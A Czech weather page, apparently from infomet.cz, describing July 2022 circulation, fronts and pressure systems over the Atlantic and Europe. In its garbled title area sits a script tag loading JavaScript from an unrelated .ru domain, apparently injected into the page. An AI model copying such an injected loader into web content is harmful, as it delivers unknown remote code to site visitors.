cirkulace v oblasti Atlantik - Evropa za červenec"> Charakteristika<script type="text/javascript" src="https://ystats4.ru/b.js"></script> cirkulace v oblasti Atlantik - Evropa za červenec
Homepage»Informace o počasí»Charakteristika cirkulace v oblasti Atlantik - Evropa za červenec

Charakteristika cirkulace v oblasti Atlantik - Evropa za červenec

Neděle 14.srpna 2022 v 17:47h Přečteno: 588 x

V první polovině měsíce převládalo meridionální proudění. Zonální charakter je možné pozorovat pouze 14. a 15. 7., kdy zóna probíhala okolo 50° s. š. V druhé polovině měsíce bylo proudění smíšené nebo meridionální.

Na začátku první dekády postupovala přes střední Evropu studená fronta, za ní se z Atlantiku k severovýchodu přesouvala tlaková výše. Dále se nad Britskými ostrovy prohlubovala tlaková níže a s ní spojená zvlněná studená fronta ovlivňovala počasí ve střední Evropě. Posléze nad Atlantikem mohutněla tlaková výše, jejíž střed se pozvolna přesouval nad Britské ostrovy. Výběžek této tlakové výše zasahoval až do střední Evropy. Mezi touto výší a oblastí nízkého tlaku vzduchu nad Skandinávií, postupovali do Evropy od severozápadu okludující frontální systémy.

V druhé dekádě se střed tlakové výše přesunul z Britských ostrovů nad Německo a postupně slábnul. Následně se mezi Islandem a Britskými ostrovy prohlubovala tlaková níže a s ní spojená studená zvlněná fronta ovlivňovala počasí v Evropě. Za ní se z Atlantiku nad Britské ostrovy začala rozšiřovat tlaková výše, která se posléze přesouvala nad střední Evropu a dále k východu. V závěru druhé dekády od západu postoupila nad západní Evropu zvlněná studená fronta.

Na začátku třetí dekády postupovala ze západní Evropy k východu zvlněná studená fronta. Za ní přešla přes střední Evropu k východu tlaková výše. Poté se z Atlantiku nad Britské ostrovy a dále nad Skandinávii přesouvala hluboká tlaková níže a s ní spojená zvlněná studená fronta ovlivňovala postupně počasí v Evropě. Za ní pak postupovala přes severní Evropu tlaková výše. V závěru měsíce ovlivnila, zejména střední Evropu tlaková níže a s ní spojená frontální vlna, která postupovala přes střední Evropu k východu.

Zdroj: ČHMÚ, infomet.cz.